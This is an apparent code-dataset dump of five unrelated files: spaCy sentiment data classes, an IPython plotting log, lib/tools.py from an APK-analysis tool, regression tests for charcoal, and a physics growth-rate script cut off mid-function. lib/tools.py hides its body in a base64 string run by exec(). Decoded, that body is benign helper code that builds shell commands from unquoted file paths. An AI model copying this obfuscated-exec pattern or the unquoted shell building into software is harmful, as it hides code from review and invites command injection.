2021-12-04T14:31:15.000Z
|
2022-02-02T10:00:03.000Z
|
asent/data_classes.py
|
EmilStenstrom/asent
|
88a5843770d21dae20da8c09fdbd4991ee8a15c1
|
[
"MIT"
] | 3
|
2021-12-06T13:57:45.000Z
|
2022-01-08T17:07:36.000Z
|
from __future__ import annotations
from typing import List, Optional, Union
from pydantic import BaseModel
from spacy.tokens import Span, Token, Doc
class TokenPolarityOutput(BaseModel):
"""A data class for the polarity output of a span,
notably allows for plotting the output"""
class Config:
arbitrary_types_allowed = True
polarity: float
token: Token
span: Span
negation: Optional[Token] = None
intensifiers: List[Token] = []
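# __repr_str__ is pydantic's repr hook; overriding it here makes repr() show the polarity rounded to 3 decimals together with the token and span.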
def __repr_str__(self, join_str: str) -> str:
return join_str.join(
repr(v) if a is None else f"{a}={v!r}"
for a, v in [
("polarity", round(self.polarity, 3)),
("token", self.token),
("span", self.span),
]
)
def __lt__(self, other: Union[TokenPolarityOutput, float]):
if isinstance(other, TokenPolarityOutput):
other = other.polarity
return self.polarity < other
def __gt__(self, other: Union[TokenPolarityOutput, float]):
if isinstance(other, TokenPolarityOutput):
other = other.polarity
return self.polarity > other
def __bool__(self):
return bool(self.polarity)
def __eq__(self, other: Union[TokenPolarityOutput, float]):
if isinstance(other, TokenPolarityOutput):
other = other.polarity
return self.polarity == other
class SpanPolarityOutput(BaseModel):
"""A data class for the polarity output of a span,
notably allows for plotting the output"""
class Config:
arbitrary_types_allowed = True
negative: float
neutral: float
positive: float
compound: float
span: Span
polarities: List[TokenPolarityOutput]
def __repr_str__(self, join_str: str) -> str:
return join_str.join(
repr(v) if a is None else f"{a}={v!r}"
for a, v in [
("neg", round(self.negative, 3)),
("neu", round(self.neutral, 3)),
("pos", round(self.positive, 3)),
("compound", round(self.compound, 4)),
("span", self.span),
]
)
def __lt__(self, other: Union[SpanPolarityOutput, float]):
if isinstance(other, SpanPolarityOutput):
other = other.compound
return self.compound < other
def __gt__(self, other: Union[SpanPolarityOutput, float]):
if isinstance(other, SpanPolarityOutput):
other = other.compound
return self.compound > other
def __eq__(self, other: Union[SpanPolarityOutput, float]) -> bool:
if isinstance(other, SpanPolarityOutput):
other = other.compound
return self.compound == other
class DocPolarityOutput(BaseModel):
"""A data class for the polarity output of a doc"""
class Config:
arbitrary_types_allowed = True
negative: float
neutral: float
positive: float
compound: float
doc: Doc
polarities: List[SpanPolarityOutput]
def __repr_str__(self, join_str: str) -> str:
return join_str.join(
repr(v) if a is None else f"{a}={v!r}"
for a, v in [
("neg", round(self.negative, 3)),
("neu", round(self.neutral, 3)),
("pos", round(self.positive, 3)),
("compound", round(self.compound, 4)),
]
)
def __lt__(self, other: Union[DocPolarityOutput, float]):
if isinstance(other, DocPolarityOutput):
other = other.compound
return self.compound < other
def __gt__(self, other: Union[DocPolarityOutput, float]):
if isinstance(other, DocPolarityOutput):
other = other.compound
return self.compound > other
def __eq__(self, other: Union[DocPolarityOutput, float]) -> bool:
if isinstance(other, DocPolarityOutput):
other = other.compound
return self.compound == other
| 30.312977
| 70
| 0.602115
| 435
| 3,971
| 5.333333
| 0.156322
| 0.034914
| 0.05431
| 0.066379
| 0.819828
| 0.792672
| 0.79181
| 0.79181
| 0.777155
| 0.777155
| 0
| 0.003218
| 0.295643
| 3,971
| 130
| 71
| 30.546154
| 0.826242
| 0.05515
| 0
| 0.632653
| 0
| 0
| 0.021996
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132653
| false
| 0
| 0.040816
| 0.040816
| 0.540816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
146f9c0da58ff4089bb65f473891c9d015d3e46b
| 3,154
|
py
|
Python
|
demos/ipython_virial_plotter.py
|
tcrundall/chronostar
|
bdb5cd965e862ba5cc21bee75d5c8620e106c0cc
|
[
"MIT"
] | null | null | null |
demos/ipython_virial_plotter.py
|
tcrundall/chronostar
|
bdb5cd965e862ba5cc21bee75d5c8620e106c0cc
|
[
"MIT"
] | null | null | null |
demos/ipython_virial_plotter.py
|
tcrundall/chronostar
|
bdb5cd965e862ba5cc21bee75d5c8620e106c0cc
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import virial_plotter as vp
get_ipython().magic(u'cat virial_plotter.py')
MU
vp.MU
vp.SIG
np.exp
import numpy as np
vp.np
np.exp(3)
np.log(3)
np.log(4) - np.log(2)
SIG
vp.SIG
np.log(10) - np.log(1)
vp.lognormal
help(vp.lognormal)
vp.lognormal(1, np.log(1), np.log(10) - np.log(1))
myxs = np.linspace(0,10)
vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1))
myxs = np.linspace(1e-5, 10)
import matplotlib.pyplot as plt
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.show()
plt.clf()
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.show()
plt.clf()
plt.plot(myxs, vp.lognormal(myxs, np.log(1), np.log(10) - np.log(1)))
plt.savefig("temp_plots/vp.png")
myxs = np.linspace(1e-5, 10, 100)
plt.clf()
plt.plot(myxs, vp.lognormal(myxs, np.log(3), np.log(10) - np.log(1)))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, np.log(3), 0.5))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, np.log(3), 1.))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, 1.05, 0.105))
plt.savefig("temp_plots/vp.png")
plt.plot(myxs, vp.lognormal(myxs, 1.05, np.sqrt(0.105)))
plt.savefig("temp_plots/vp.png")
main_mean = np.log(3)
mode = 3
stds = np.linspace(0.2,1.0,5)
stds
stds = np.array([1.,10.,10])
means = stds**2 + np.log(mode)
means
stds = np.linspace(1.,10.,10)
stds = np.linspace(1.,10.,10)
means = stds**2 + np.log(mode)
means
stds = np.linspace(1.,4,10)
means = stds**2 + np.log(mode)
means
plt.clf()
for mn, std in zip(means, stds):
plt.plot(myxs, vp.lognormal(myxs, mn, std))
plt.savefig("temp_plots/vp.png")
for mn, std in zip(means, stds):
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.clf()
for mn, std in zip(means, stds):
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.savefig("temp_plots/vp.png")
stds
stds = np.linspace(0.7, 2,3)
plt.clf()
for std in stds:
mn = std**2 + mode
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.savefig("temp_plots/vp.png")
mode
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.clf()
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)))
plt.savefig("temp_plots/vp.png")
plt.clf()
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)),
label=r"$\sigma = ${:.2}".format(std))
plt.savefig("temp_plots/vp.png")
plt.legend(loc='best')
plt.savefig("temp_plots/vp.png")
stds = np.array([0.2, 0.7, 1.2, 1.7])
plt.clf()
for std in stds:
mn = std**2 + np.log(mode)
plt.plot(myxs, vp.lognormal(myxs, mn, std)/np.max(vp.lognormal(myxs, mn, std)),
label=r"$\sigma = ${:.2}".format(std))
plt.legend(loc='best')
plt.xlabel(r"$\alpha$")
plt.savefig("temp_plots/vp.png")
plt.legend(loc=4)
plt.savefig("temp_plots/vp.png")
| 28.414414
| 83
| 0.653456
| 617
| 3,154
| 3.311183
| 0.110211
| 0.088106
| 0.183554
| 0.108174
| 0.85022
| 0.835047
| 0.796378
| 0.780715
| 0.752325
| 0.706314
| 0
| 0.043179
| 0.126189
| 3,154
| 110
| 84
| 28.672727
| 0.698113
| 0.004122
| 0
| 0.60396
| 0
| 0
| 0.097802
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.029703
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
147160bd989d35f9fbf36ea166b2e82db1c5c3f8
| 5,392
|
py
|
Python
|
lib/tools.py
|
Ba-hub/R3verseBug
|
2e1f5274a36b6b8b582e2620f1457bde8c262e56
|
[
"MIT"
] | 4
|
2021-08-31T17:36:17.000Z
|
2021-11-08T08:03:58.000Z
|
lib/tools.py
|
Ba-hub/R3verseBug
|
2e1f5274a36b6b8b582e2620f1457bde8c262e56
|
[
"MIT"
] | null | null | null |
lib/tools.py
|
Ba-hub/R3verseBug
|
2e1f5274a36b6b8b582e2620f1457bde8c262e56
|
[
"MIT"
] | 2
|
2021-09-01T02:16:47.000Z
|
2022-02-04T22:28:56.000Z
|
import base64
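# The actual module body is stored as a base64-encoded blob and executed at import time via exec() below.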
exec(base64.b64decode('IyEvdXNyL2Jpbi9weXRob24zCiMgLSotIGNvZGluZzp1dGYtOCAtKi0KaW1wb3J0IHJhbmRvbQppbXBvcnQgb3MKaW1wb3J0IHN0cmluZwppbXBvcnQgc3VicHJvY2VzcwppbXBvcnQgcmUKZnJvbSByaWNoLmNvbnNvbGUgaW1wb3J0IENvbnNvbGUKCgpjb25zb2xlID0gQ29uc29sZSgpCgojIEZpbGUgd2hpdGVsaXN0LCBpZiB5b3UgZG9u4oCZdCBuZWVkIGl0LCB5b3UgY2FuIGNsZWFyIGl0LCBvciB5b3UgY2FuIGFkZCBpdCB5b3Vyc2VsZgp3aGl0ZUxpc3QgPSBbJ2ZhY2Vib29rJywgJ3RlbmNlbnQnLCAnaHVhd2VpJywgJ2FsaXl1bicsICdhbmRyb2lkL3N1cHBvcnQnLCAneGlhb21pJywgJ3Zpdm8nLCAnb3BwbycsICdhaXJibmInLCAnYW1hcCcsCiAgICAgICAgICAgICAnYWxpcGF5JywgJ2dvb2dsZScsICdva2h0dHAzJywgJ3JldHJvZml0MicsICdtb3ppbGxhJywgJ2ZyZWVtYXJrZXInLCAnYWxpYmFiYScsICdxaWhvbycsICdnc29uJywgJ2pwdXNoJywKICAgICAgICAgICAgICdidWd0YWdzJywgJ3RyZWxsbycsICdidW1wdGVjaCcsICdqaWd1YW5nJywgJ2dpdGh1YicsICd1bWVuZycsICdncmVlbnJvYm90JywgJ2VjbGlwc2UnLCAnYnVnbHknLCAnc2luYScsCiAgICAgICAgICAgICAnd2VpYm8nLCAnajI1NicsICd0YW9iYW8vd2VleCcsICdpZmx5dGVrJywgJ2FuZHJvaWR4LycsICdtZWl6dScsICdpby9hZ29yYScsICdpamtwbGF5ZXInLCAnc3FsY2lwaGVyJywKICAgICAgICAgICAgICdjbWljL3NzbycsICdzaGFueWFuX3NkaycsICdzdmdhcGxheWVyJywgJ2lvL2ZsdXR0ZXInLCAnYnl0ZWRhbmNlJywgJ2tvdGxpbicsICdvcmcvYXBhY2hlJywgJ29yZy9hc3BlY3RqJywKICAgICAgICAgICAgICdiYWlkdScsICd5b3V6YW4nLCAnamRwYXlzZGsnLCAncXEnLCAna290bGlueCcsICcvYW5kcm9pZC8nXQoKdGFza3MgPSBbXQoKCmNsYXNzIFJ1bkNNRDoKICAgIGRlZiBfX2luaXRfXyhzZWxmKToKICAgICAgICBzZWxmLnAgPSBOb25lCiAgICAgICAgc2VsZi5jbWQgPSBOb25lCgogICAgZGVmIHJ1bl9jbWQoc2VsZik6CiAgICAgICAgc2VsZi5wID0gc3VicHJvY2Vzcy5Qb3BlbihzZWxmLmNtZCwgc3Rkb3V0PXN1YnByb2Nlc3MuUElQRSwgc3RkZXJyPXN1YnByb2Nlc3MuUElQRSwgc2hlbGw9VHJ1ZSkKICAgICAgICB0YXNrcy5hcHBlbmQoc2VsZikKICAgICAgICByZXR1cm4gc2VsZi5wLmNvbW11bmljYXRlKCkKCiAgICBAcHJvcGVydHkKICAgIGRlZiBpc19ydW5uaW5nKHNlbGYpOgogICAgICAgIGlmIHNlbGYucC5wb2xsKCkgaXMgTm9uZToKICAgICAgICAgICAgcmV0dXJuIFRydWUKICAgICAgICBlbHNlOgogICAgICAgICAgICB0YXNrcy5yZW1vdmUoc2VsZikKICAgICAgICAgICAgcmV0dXJuIEZhbHNlCgogICAgZGVmIHN0b3Aoc2VsZik6CiAgICAgICAgc2VsZi5wLmtpbGwoKQogICAgICAgIHRhc2tzLnJlbW92ZShzZWxmKQoKICAgIGRlZiBsb2coc2VsZik6CiAgICAgICAgcmV0dXJuICcnLmpvaW4oW3N0cihpdGVtLCBlbmNvZGluZz0ndXRmLTgnKSBmb3IgaXRlbSBpbiBzZWxmLnAuY29tbXVuaWNhdGUoKV0pCgoKZGVmIGNtZFN0cmluZyhzdHJsaW5lKToKICAgIHJldHVybiBzdHJsaW5lICsgJyB8ICcgKyBncmVwVGhpcmRGaWxlKCkKCgpkZWYgcmFuZG9tU3RyKG51bSk6CiAgICByZXR1cm4gJ18nICsgJycuam9pbihyYW5kb20uc2FtcGxlKHN0cmluZy5hc2NpaV9sZXR0ZXJzICsgc3RyaW5nLmRpZ2l0cywgbnVtKSkKCgpkZWYgZ2V0QVBLRmlsZXMoZGlyKToKICAgIGZpbGVzQXJyYXkgPSBbXQogICAgZGlybGlzdCA9IG9zLndhbGsoZGlyKQogICAganNGaWxlcyA9IFtdCiAgICBmb3Igcm9vdCwgZGlycywgZmlsZXMgaW4gZGlybGlzdDoKICAgICAgICBmb3IgZmlsZSBpbiBmaWxlczoKICAgICAgICAgICAgcGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmaWxlKQogICAgICAgICAgICBpZiBmaWxlLmVuZHN3aXRoKCcuc21hbGknKSBvciBmaWxlLmVuZHN3aXRoKCcuc28nKSBvciBmaWxlLmVuZHN3aXRoKCcueG1sJykgb3IgZmlsZS5lbmRzd2l0aCgKICAgICAgICAgICAgICAgICAgICAnLnltbCcpIG9yIGZpbGUuZW5kc3dpdGgoJy5odG1sJyk6CiAgICAgICAgICAgICAgICBpZiAnL29yaWdpbmFsLycgbm90IGluIHBhdGg6CiAgICAgICAgICAgICAgICAgICAgZmlsZXNBcnJheS5hcHBlbmQocGF0aCkKICAgICAgICAgICAgaWYgZmlsZS5lbmRzd2l0aCgnLmpzJyk6CiAgICAgICAgICAgICAgICBqc0ZpbGVzLmFwcGVuZChwYXRoKQogICAgICAgICAgICBpZiBmaWxlLmVuZHN3aXRoKCcuanNidW5kbGUnKSBvciBmaWxlLmVuZHN3aXRoKCcucm5idW5kbGUnKToKICAgICAgICAgICAgICAgIHBhdGggPSBjaGFuZ2VKU0J1bmRsZUZpbGUocGF0aCkKICAgICAgICAgICAgICAgIGpzRmlsZXMuYXBwZW5kKHBhdGgpCiAgICBuZXdQYXRocyA9IGpzQmVhdXRpZnkoanNGaWxlcykKICAgIGZpbGVzQXJyYXkgPSBmaWxlc0FycmF5ICsgbmV3UGF0aHMKICAgIHJldHVybiBmaWxlc0FycmF5CgoKZGVmIGdldEZpbGVOYW1lKHBhdGgpOgogICAgaWYgbGVuKHBhdGgpID4gMDoKICAgICAgICBpdGVtcyA9IHN0cihwYXRoKS5zcGxpdCgnLycpCiAgICAgICAgZGlyID0gJycKICAgICAgICBzdGFydCA9IC0xCiAgICAgICAgZm9yIGkgaW4gcmFuZ2UobGVu
KGl0ZW1zKSk6CiAgICAgICAgICAgIGlmICdzbWFsaScgaW4gaXRlbXNbaV0gYW5kICcuc21hbGknIG5vdCBpbiBpdGVtc1tpXToKICAgICAgICAgICAgICAgIHN0YXJ0ID0gaQogICAgICAgICAgICBpZiBzdGFydCAhPSAtMSBhbmQgc3RhcnQgIT0gaToKICAgICAgICAgICAgICAgIGRpciArPSBpdGVtc1tpXSArICcuJwogICAgICAgIHJldHVybiBkaXJbOi0xXQogICAgZWxzZToKICAgICAgICByZXR1cm4gJycKCgpkZWYganNCZWF1dGlmeShqc0ZpbGVzKToKICAgIG5ld0ZpbGVzID0gW10KICAgIGZvciBmaWxlIGluIGpzRmlsZXM6CiAgICAgICAgYmVhdXRpZnlGaWxlID0gZmlsZVs6LTNdICsgJzEuanMnCiAgICAgICAgbmV3RmlsZXMuYXBwZW5kKGJlYXV0aWZ5RmlsZSkKICAgICAgICBzdHJsaW5lID0gJ2pzLWJlYXV0aWZ5ICcgKyBmaWxlICsgJyA+ICcgKyBiZWF1dGlmeUZpbGUKICAgICAgICBydW5uZXIgPSBSdW5DTUQoKQogICAgICAgIHJ1bm5lci5jbWQgPSBzdHJsaW5lCiAgICAgICAgcnVubmVyLnJ1bl9jbWQoKQogICAgd2hpbGUgbGVuKHRhc2tzKSA+IDA6CiAgICAgICAgZm9yIGl0ZW0gaW4gdGFza3M6CiAgICAgICAgICAgIGl0ZW0uaXNfcnVubmluZwogICAgcmV0dXJuIG5ld0ZpbGVzCgoKZGVmIGNoYW5nZUpTQnVuZGxlRmlsZShmaWxlbmFtZSk6CiAgICBwb3J0aW9uID0gb3MucGF0aC5zcGxpdGV4dChmaWxlbmFtZSkKICAgIG5ld05hbWUgPSBmaWxlbmFtZQogICAgaWYgcG9ydGlvblsxXSA9PSAnLmpzYnVuZGxlJyBvciBwb3J0aW9uWzFdID09ICcucm5idW5kbGUnOgogICAgICAgIG5ld05hbWUgPSBzdHIocG9ydGlvblswXSkgKyAnLmpzJwogICAgICAgIG9zLnJlbmFtZShmaWxlbmFtZSwgbmV3TmFtZSkKICAgIHJldHVybiBuZXdOYW1lCgoKZGVmIGdldFVSTChsaW5lKToKICAgIHBhdHRlcm4gPSByZS5jb21waWxlKHInaHR0cFtzXT86Ly8oPzpbYS16QS1aXXxbMC05XXxbJC1fQC4mK118WyEqXChcKSxdfCg/OiVbMC05YS1mQS1GXVswLTlhLWZBLUZdKSkrJykKICAgIHVybHMgPSByZS5maW5kYWxsKHBhdHRlcm4sIGxpbmVbOi0xXSkKICAgIHJldHVybiB1cmxzCgoKZGVmIGdyZXBUaGlyZEZpbGUoKToKICAgIHJldHVybiAiZ3JlcCAtdiAnIiArICdcfCcuam9pbih3aGl0ZUxpc3QpICsgIiciCgoKZGVmIGdldFNtYWxpcyhhcnJzKToKICAgIHBhdGhzID0gW10KICAgIGZvciBpdGVtIGluIGFycnM6CiAgICAgICAgaWYgJy5zbWFsaTonIGluIGl0ZW06CiAgICAgICAgICAgIHBhdGggPSBpdGVtLnNwbGl0KCc6JylbMF0KICAgICAgICAgICAgaWYgcGF0aCBub3QgaW4gcGF0aHM6CiAgICAgICAgICAgICAgICBwYXRocy5hcHBlbmQocGF0aCkKICAgIHJldHVybiBwYXRocw=='))
| 2,696
| 5,378
| 0.997404
| 9
| 5,392
| 597.555556
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084045
| 0.000371
| 5,392
| 2
| 5,378
| 2,696
| 0.913729
| 0
| 0
| 0
| 0
| 0
| 0.992398
| 0.992398
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
1af4775a19055bc63f5325e2bd4f8f3c61af8609
| 2,233
|
py
|
Python
|
tests/test_contigs_list_contaminants.py
|
dib-lab/charcoal
|
b9c2b8d920f7b144c28daae5eba7ee46646ac287
|
[
"BSD-3-Clause"
] | 21
|
2020-05-08T20:51:19.000Z
|
2022-02-04T23:00:17.000Z
|
tests/test_contigs_list_contaminants.py
|
dib-lab/charcoal
|
b9c2b8d920f7b144c28daae5eba7ee46646ac287
|
[
"BSD-3-Clause"
] | 162
|
2020-03-11T21:32:28.000Z
|
2022-03-09T01:02:14.000Z
|
tests/test_contigs_list_contaminants.py
|
dib-lab/charcoal
|
b9c2b8d920f7b144c28daae5eba7ee46646ac287
|
[
"BSD-3-Clause"
] | 1
|
2020-03-11T21:24:13.000Z
|
2020-03-11T21:24:13.000Z
|
import os.path
from . import pytest_utils as utils
import json
from charcoal import contigs_list_contaminants
@utils.in_tempdir
def test_1_loomba(location):
# regression test/check for same results on Loomba
args = utils.Args()
args.genome = utils.relative_file("demo/genomes/LoombaR_2017__SID1050_bax__bin.11.fa.gz")
args.genome_sig = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.sig")
args.matches_csv = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.csv")
args.databases = [utils.relative_file('tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.zip')]
args.lineages_csv = utils.relative_file("tests/test-data/test-match-lineages.csv")
args.hitlist = utils.relative_file("tests/test-data/loomba-hit-list.csv")
args.json_out = os.path.join(location, 'tax.json')
args.match_rank = 'genus'
status = contigs_list_contaminants.main(args)
assert status == 0
assert os.path.exists(args.json_out)
with open(args.json_out, 'rt') as fp:
results = json.load(fp)
assert results != {}
@utils.in_tempdir
def test_1_loomba_abund(location):
# regression test/check for same results on Loomba - with abund sigs
args = utils.Args()
args.genome = utils.relative_file("demo/genomes/LoombaR_2017__SID1050_bax__bin.11.fa.gz")
args.genome_sig = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.sig")
args.matches_csv = utils.relative_file("tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.csv")
args.databases = [utils.relative_file('tests/test-data/loomba/LoombaR_2017__SID1050_bax__bin.11.fa.gz.matches.abund.zip')]
args.lineages_csv = utils.relative_file("tests/test-data/test-match-lineages.csv")
args.hitlist = utils.relative_file("tests/test-data/loomba-hit-list.csv")
args.json_out = os.path.join(location, 'tax.json')
args.match_rank = 'genus'
status = contigs_list_contaminants.main(args)
assert status == 0
assert os.path.exists(args.json_out)
with open(args.json_out, 'rt') as fp:
results = json.load(fp)
assert results != {}
| 42.942308
| 126
| 0.743395
| 342
| 2,233
| 4.596491
| 0.195906
| 0.099237
| 0.129771
| 0.139949
| 0.927481
| 0.927481
| 0.927481
| 0.891858
| 0.891858
| 0.829517
| 0
| 0.043299
| 0.131214
| 2,233
| 51
| 127
| 43.784314
| 0.76701
| 0.0515
| 0
| 0.789474
| 0
| 0.026316
| 0.338534
| 0.32435
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.052632
| false
| 0
| 0.105263
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2120419e1b7a9fa90c11b68cfcb67fda90e7e959
| 16,081
|
py
|
Python
|
ibs/old/CIMP_3HC.py
|
carneirofc/lnls
|
55bc009f24927d14fc14bdb2ca1c067b5fe413c2
|
[
"MIT"
] | 4
|
2015-04-13T23:20:42.000Z
|
2019-03-18T13:31:03.000Z
|
ibs/old/CIMP_3HC.py
|
carneirofc/lnls
|
55bc009f24927d14fc14bdb2ca1c067b5fe413c2
|
[
"MIT"
] | 6
|
2015-04-16T04:29:40.000Z
|
2022-02-08T18:41:05.000Z
|
ibs/old/CIMP_3HC.py
|
carneirofc/lnls
|
55bc009f24927d14fc14bdb2ca1c067b5fe413c2
|
[
"MIT"
] | 2
|
2015-12-03T08:25:55.000Z
|
2022-02-08T13:05:47.000Z
|
import numpy as _np
import math as _math
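# g_CIMP: the scattering function g(x) used by the CIMP intrabeam-scattering model, approximated with separate fits when all x < 1 or all x > 1, and the general expression otherwise.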
def g_CIMP(x):
x=x[0,:]
g=_np.zeros(len(x))
#g=2.691*(1-0.2288964/x)*1/((1+0.16*x)*(1+1.35*_np.exp(-x/0.2)))
if (max(x)<1):
g=-18.743261164767357+101.6507221241339*x**(0.33333333)-104.59646433814892*_np.sqrt(x)+33.73393945878933*x-10.325598001906716*x**(1.5)
elif (min(x)>1):
g=1.1976693536243692*(1-0.2660904859953754/x)*1/((1+0.04920104690300144*x)*(1-0.5874697493344921*_np.exp(-x*0.09913039025775051)))
else:
g=2.691*(1-0.2288964/x)*1/((1+0.16*x)*(1+1.35*_np.exp(-x/0.2)))
return g
def gauss_function(x, a, x0, sigma):
return a*_np.exp(-(x-x0)**2/(2*sigma**2))
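# calc_sigma: normalize a measured beam profile and return its centroid (ycm) and rms width (yvar).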
def calc_sigma(pos,profile):
max_val=max(profile)
min_val=min(profile)
profile=(profile-min_val)/max_val
aux=profile*pos
ycm=_np.sum(aux)/_np.sum(profile)
aux=profile*(pos-ycm)**2
yvar=_np.sqrt(_np.sum(aux)/_np.sum(profile))
return (ycm,yvar)
def Calc_Growth(twiss,param):
#Define parameters
brel=_math.sqrt(1-1/param['gamma']**2)
ex=param['exi']
ey=param['eyi']
ss=param['ssi']
sp=param['spi']
#Define twiss arrays
s=_np.zeros(len(twiss))
betax=_np.zeros(len(twiss))
alphax=_np.zeros(len(twiss))
betay=_np.zeros(len(twiss))
alphay=_np.zeros(len(twiss))
Dx=_np.zeros(len(twiss))
Dpx=_np.zeros(len(twiss))
Dy=_np.zeros(len(twiss))
Dpy=_np.zeros(len(twiss))
# s=twiss[:,0]
# betax=twiss[:,2]
# alphax=twiss[:,3]
# betay=twiss[:,6]
# alphay=twiss[:,7]
# Dx=twiss[:,4]
# Dpx=twiss[:,5]
# Dy=twiss[:,8]
# Dpy=twiss[:,9]
s=twiss[:,0]
#len=twiss[:,1]
#mux=twiss[:,2]
betax=twiss[:,3]
alphax=twiss[:,4]
Dx=twiss[:,5]
Dpx=twiss[:,6]
#muy=twiss[:,7]
betay=twiss[:,8]
alphay=twiss[:,9]
Dy=twiss[:,10]
Dpy=twiss[:,11]
#Calculate the parameters
Np = param['Np']
A=param['cluz']*Np*param['r0']**2/(64*_np.pi**2*brel**3*param['gamma']**4*ex*ey*ss*sp)
logCIMP=_np.log(param['gamma']**2*ex*_np.sqrt(betay*ey)/(param['r0']*betax))
Hx=1/betax*[Dx**2+(betax*Dpx+alphax*Dx)**2]
Hy=1/betay*[Dy**2+(betay*Dpy+alphay*Dy)**2]
SigH=_np.sqrt(1/sp**2+Hx/ex+Hy/ey)**(-1)
aCIMP=SigH/param['gamma']*_np.sqrt(betax/ex)
bCIMP=SigH/param['gamma']*_np.sqrt(betay/ey)
#Calculate Function g
g_ab=g_CIMP(aCIMP/bCIMP)
g_ba=g_CIMP(bCIMP/aCIMP)
#Saves values for the ratio a/b and b/a
#f=open('RatioAB.txt','w')
#for j in range(len(aCIMP[0,:])):
# f.write(str(aCIMP[0,j]/bCIMP[0,j])+'\t\t'+str(bCIMP[0,j]/aCIMP[0,j])+'\n')
#f.close()
#Calculate Growth Rates
fp=A*logCIMP*(SigH**2/sp**2)*(g_ba/aCIMP+g_ab/bCIMP)
fx=A*logCIMP*(-aCIMP*g_ba+Hx*SigH**2/ex*(g_ba/aCIMP+g_ab/bCIMP))
fy=A*logCIMP*(-bCIMP*g_ab+Hy*SigH**2/ey*(g_ba/aCIMP+g_ab/bCIMP))
#Integrate along the s coordinate
invTp=2*_math.pi**(3.0/2.0)*_np.trapz(fp,s)
invTx=2*_math.pi**(3.0/2.0)*_np.trapz(fx,s)
invTy=2*_math.pi**(3.0/2.0)*_np.trapz(fy,s)
#Calculate growth
Tp=invTp
Tx=invTx
Ty=invTy
return (Tx,Ty,Tp)
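# Hedged editor sketch (not part of the original module): a minimal illustration of the
# parameter dictionary Calc_Growth expects; every number below is a placeholder chosen
# for the example, not a machine parameter taken from this repository.
def _example_calc_growth(twiss):
    param = {
        'gamma': 3.0e9/0.511e6,   # Lorentz factor of a 3 GeV electron beam (illustrative)
        'exi': 250e-12,           # horizontal emittance [m rad]
        'eyi': 2.5e-12,           # vertical emittance [m rad]
        'ssi': 3e-3,              # bunch length [m]
        'spi': 8e-4,              # relative energy spread
        'Np': 1.0e9,              # particles per bunch
        'r0': 2.818e-15,          # classical electron radius [m]
        'cluz': 299792458.0,      # speed of light [m/s]
    }
    return Calc_Growth(twiss, param)  # (Tx, Ty, Tp) growth-rate integrals along s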
# Function that iterates emittances for the case with no harmonic system (simple calculation of the bunch length)
def Iterate_emittances(twiss,param):
#Define differences
i=1
time=0
diff1=1
diff2=1
diff3=1
diff4=1
difftot=diff1+diff2+diff3+diff4
#Calculate U0
U0=param['Cgamma']/(2*_math.pi)*(param['En']/1e+9)**4*param['I2']*1e+9
#print U0
#Calculate damping partition numbers
Jx=1-param['I4']/param['I2']
Jy=1
Jp=2+param['I4']/param['I2']
#print Jx,Jy,Jp
# Calculate damping times
taux=(2*param['En']*param['C'])/(Jx*U0*param['cluz'])
tauy=(2*param['En']*param['C'])/(Jy*U0*param['cluz'])
